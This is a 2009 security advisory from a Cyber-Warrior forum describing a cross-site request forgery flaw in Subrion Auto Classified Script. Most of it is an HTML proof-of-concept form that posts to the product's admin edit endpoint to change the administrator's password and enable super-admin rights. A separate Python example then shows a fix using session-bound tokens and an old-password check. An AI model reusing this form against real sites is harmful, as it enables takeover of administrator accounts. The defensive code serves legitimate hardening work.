Subrion Auto Classified Script ~ XSRF Vuln. | Cyber-Warrior Information Technology's World
Author: Bug Researchers/CWH1RLPOOL
Date: 13.09.2009 20:14:04
Subrion Auto Classified Script ~ XSRF Vuln.
< ------------------- header data start ------------------- >
#############################################################
# Application Name : Subrion Auto Classified Script
# Vulnerable Type  : XSRF
# Infection        : Admin account details can be changed remotely and automatically.
# Bug Fix Advice   : A session key (session token) should be added to the form, and the old password should be asked for.
# Author           : BUG RESEARCHERS//CWH1RLPOOL
#############################################################
< ------------------- header data end ------------------- >

< -- bug code start -- >
```html
<form action="http://autos.subrion.com/admin/admins_manage.php?id=1&action=edit" method="post">
<input type="hidden" name="prevent_csrf" value="174eac6f2b" />
<table cellspacing="0" cellpadding="0" width="100%" class="striped">
<td class="caption" colspan="2"><strong>General Information</strong></td>
<td width="200"><strong>username:</strong></td>
<td><input type="text" name="username" size="22" value="admin" /></td>
<td><strong>Full Name:</strong></td>
<td><input type="text" name="fullname" size="22" value="Administrator" /></td>
<td><strong>Email:</strong></td>
<td><input type="text" name="email" size="22" value="admin@subrion.com" /></td>
<td><strong>password:</strong></td>
<td><input type="password" name="new_pass" size="22" /></td>
<td><strong>password Confirmation:</strong></td>
<td><input type="password" name="new_pass2" size="22" /></td>
<td><strong>Status:</strong></td>
<td><select name="status">
<option value="approval">Approval</option>
<option value="active" selected="selected">Active</option>
</select></td>
<td class="caption" colspan="2"><strong>Admin Permissions</strong></td>
<td><strong>Super Admin:</strong></td>
<td><input type="radio" name="super" value="1" id="type1" checked="checked" onclick="javascript:$('#permissions').fadeOut();" /><label for="type1">Enabled</label>
<input type="radio" name="super" value="0" id="type0" onclick="javascript:$('#permissions').fadeIn();" /><label for="type0">Disabled</label>
</td>
</table>
<div id="permissions" style="display: none;">
<fieldset class="collapsible" style="float:left;margin-left:20px;"><legend>Common</legend>
<input type="checkbox" onclick="var hsrc = this; $('input.group_Common').each(function() { if($(this).attr('checked') && !$(hsrc).attr('checked')) { $(this).removeAttr('checked'); } else { $(this).attr('checked', 'checked'); } });"><i>select All </i><br />
<ul style="list-style-type:none">
<li><input type="checkbox" class="group_Common" name="permissions[]" value="admin_home" id="tsadmin_home" /><label for="tsadmin_home">Admin Panel</label></li>
<li><input type="checkbox" class="group_Common" name="permissions[]" value="configuration" id="tsconfiguration" /><label for="tsconfiguration">Configuration</label></li>
<li><input type="checkbox" class="group_Common" name="permissions[]" value="admins_manage" id="tsadmins_manage" /><label for="tsadmins_manage">Manage Admins</label></li>
<li><input type="checkbox" class="group_Common" name="permissions[]" value="pages_manage" id="tspages_manage" /><label for="tspages_manage">Manage Pages</label></li>
<li><input type="checkbox" class="group_Common" name="permissions[]" value="plugins_manage" id="tsplugins_manage" /><label for="tsplugins_manage">Manage Plugins</label></li>
<li><input type="checkbox" class="group_Common" name="permissions[]" value="packages_manage" id="tspackages_manage" /><label for="tspackages_manage">Manage Packages</label></li>
<li><input type="checkbox" class="group_Common" name="permissions[]" value="database_manage" id="tsdatabase_manage" /><label for="tsdatabase_manage">Manage Database</label></li>
<li><input type="checkbox" class="group_Common" name="permissions[]" value="menus_manage" id="tsmenus_manage" /><label for="tsmenus_manage">Manage Menus</label></li>
<li><input type="checkbox" class="group_Common" name="permissions[]" value="language_manage" id="tslanguage_manage" /><label for="tslanguage_manage">Language Manager</label></li>
<li><input type="checkbox" class="group_Common" name="permissions[]" value="blocks_manage" id="tsblocks_manage" /><label for="tsblocks_manage">Manage Blocks</label></li>
<li><input type="checkbox" class="group_Common" name="permissions[]" value="visual_manage" id="tsvisual_manage" /><label for="tsvisual_manage">Visual Manage</label></li>
<li><input type="checkbox" class="group_Common" name="permissions[]" value="transactions_manage" id="tstransactions_manage" /><label for="tstransactions_manage">Manage Transactions</label></li>
<li><input type="checkbox" class="group_Common" name="permissions[]" value="plans_manage" id="tsplans_manage" /><label for="tsplans_manage">Manage Plans</label></li>
</ul>
</fieldset>
<fieldset class="collapsible" style="float:left;margin-left:20px;"><legend>Accounts</legend>
<input type="checkbox" onclick="var hsrc = this; $('input.group_Accounts').each(function() { if($(this).attr('checked') && !$(hsrc).attr('checked')) { $(this).removeAttr('checked'); } else { $(this).attr('checked', 'checked'); } });"><i>select All </i><br />
<ul style="list-style-type:none">
<li><input type="checkbox" class="group_Accounts" name="permissions[]" value="accounts_fields_manage" id="tsaccounts_fields_manage" /><label for="tsaccounts_fields_manage">Accounts Fields</label></li>
<li><input type="checkbox" class="group_Accounts" name="permissions[]" value="accounts_fields_groups_manage" id="tsaccounts_fields_groups_manage" /><label for="tsaccounts_fields_groups_manage">Accounts FieldGroups</label></li>
<li><input type="checkbox" class="group_Accounts" name="permissions[]" value="accounts_manage" id="tsaccounts_manage" /><label for="tsaccounts_manage">Manage Accounts</label></li>
<li><input type="checkbox" class="group_Accounts" name="permissions[]" value="accounts_search" id="tsaccounts_search" /><label for="tsaccounts_search">Search account</label></li>
<li><input type="checkbox" class="group_Accounts" name="permissions[]" value="accounts_add" id="tsaccounts_add" /><label for="tsaccounts_add">Add account</label></li>
</ul>
</fieldset>
<fieldset class="collapsible" style="float:left;margin-left:20px;"><legend>Autos</legend>
<input type="checkbox" onclick="var hsrc = this; $('input.group_Autos').each(function() { if($(this).attr('checked') && !$(hsrc).attr('checked')) { $(this).removeAttr('checked'); } else { $(this).attr('checked', 'checked'); } });"><i>select All </i><br />
<ul style="list-style-type:none">
<li><input type="checkbox" class="group_Autos" name="permissions[]" value="autos_fields_groups_manage" id="tsautos_fields_groups_manage" /><label for="tsautos_fields_groups_manage">Autos Field Groups</label></li>
<li><input type="checkbox" class="group_Autos" name="permissions[]" value="makes_browse" id="tsmakes_browse" /><label for="tsmakes_browse">Browse Makes</label></li>
<li><input type="checkbox" class="group_Autos" name="permissions[]" value="makes_submit" id="tsmakes_submit" /><label for="tsmakes_submit">Submit Make</label></li>
<li><input type="checkbox" class="group_Autos" name="permissions[]" value="autos_fields_manage" id="tsautos_fields_manage" /><label for="tsautos_fields_manage">Autos Fields</label></li>
<li><input type="checkbox" class="group_Autos" name="permissions[]" value="autos_manage" id="tsautos_manage" /><label for="tsautos_manage">Manage Autos</label></li>
<li><input type="checkbox" class="group_Autos" name="permissions[]" value="autos_submit" id="tsautos_submit" /><label for="tsautos_submit">Submit Auto</label></li>
<li><input type="checkbox" class="group_Autos" name="permissions[]" value="autos_search" id="tsautos_search" /><label for="tsautos_search">Search Auto</label></li>
</ul>
</fieldset>
<fieldset class="collapsible" style="float:left;margin-left:20px;"><legend>Other</legend>
<input type="checkbox" onclick="var hsrc = this; $('input.group_Other').each(function() { if($(this).attr('checked') && !$(hsrc).attr('checked')) { $(this).removeAttr('checked'); } else { $(this).attr('checked', 'checked'); } });"><i>select All </i><br />
<ul style="list-style-type:none">
<li><input type="checkbox" class="group_Other" name="permissions[]" value="contact_us" id="tscontact_us" /><label for="tscontact_us">Contact Us</label></li>
</ul>
</fieldset>
<div style="clear:both;"></div>
</div>
<table cellspacing="0" width="100%">
<tr class="all">
<td colspan="2"><input type="submit" class="button" name="save" value="Save Changes" />
<input type="hidden" name="id" value="1" />
<input type="hidden" name="action" value="edit" />
</td>
</tr>
</table>
</form>
```
< -- bug code end -- >
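The two fix points in the advisory header (a token bound to the session, and the old password asked for before a password change) as an added server-side check in Python; this is example code, not part of the advisory or of Subrion's own code. The secret, the stored hash, the session ids and the field name old_pass are assumptions for the example; the fixed prevent_csrf value is the one in the PoC form above.

```python
import hashlib
import hmac

# Constructed values for this example; a deployment loads the secret from
# configuration and uses a real password hash (bcrypt/argon2) instead of sha256.
SERVER_SECRET = b"constructed-example-secret"
STORED_PW_HASH = hashlib.sha256(b"constructed-old-password").hexdigest()

def issue_csrf_token(session_id: str) -> str:
    """Per-session token: HMAC-SHA256(secret, session id). A token copied from
    one session (the PoC's fixed prevent_csrf value) fails for every other."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()

def password_matches(stored_hash: str, candidate: str) -> bool:
    digest = hashlib.sha256(candidate.encode()).hexdigest()
    return hmac.compare_digest(stored_hash, digest)

def validate_admin_edit(session: dict, form: dict, stored_pw_hash: str) -> tuple:
    """Checks for admins_manage.php?action=edit; returns (ok, reason). The field
    name 'old_pass' is assumed: the advice asks for it, the original form lacks it."""
    expected = issue_csrf_token(session["id"])
    if not hmac.compare_digest(form.get("prevent_csrf", ""), expected):
        return False, "csrf token missing or not bound to this session"
    if form.get("new_pass") or form.get("new_pass2"):
        if form.get("new_pass") != form.get("new_pass2"):
            return False, "password confirmation mismatch"
        if not password_matches(stored_pw_hash, form.get("old_pass", "")):
            return False, "old password required to change password"
    return True, "ok"

def demo() -> dict:
    """Constructed scenario: the PoC's fixed token against a victim session,
    next to a genuine submission carrying the session-bound token."""
    victim = {"id": "sess-victim-0001"}
    forged = {"prevent_csrf": "174eac6f2b", "username": "admin",
              "new_pass": "p", "new_pass2": "p", "super": "1"}
    genuine = {"prevent_csrf": issue_csrf_token(victim["id"]), "username": "admin",
               "new_pass": "p", "new_pass2": "p", "old_pass": "constructed-old-password"}
    return {"forged": validate_admin_edit(victim, forged, STORED_PW_HASH),
            "genuine": validate_admin_edit(victim, genuine, STORED_PW_HASH)}

if __name__ == "__main__":
    print(demo())
```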
Cyber-Warrior TIM All Legal and illegal Rights Reserved.\CWDoktoray 2001©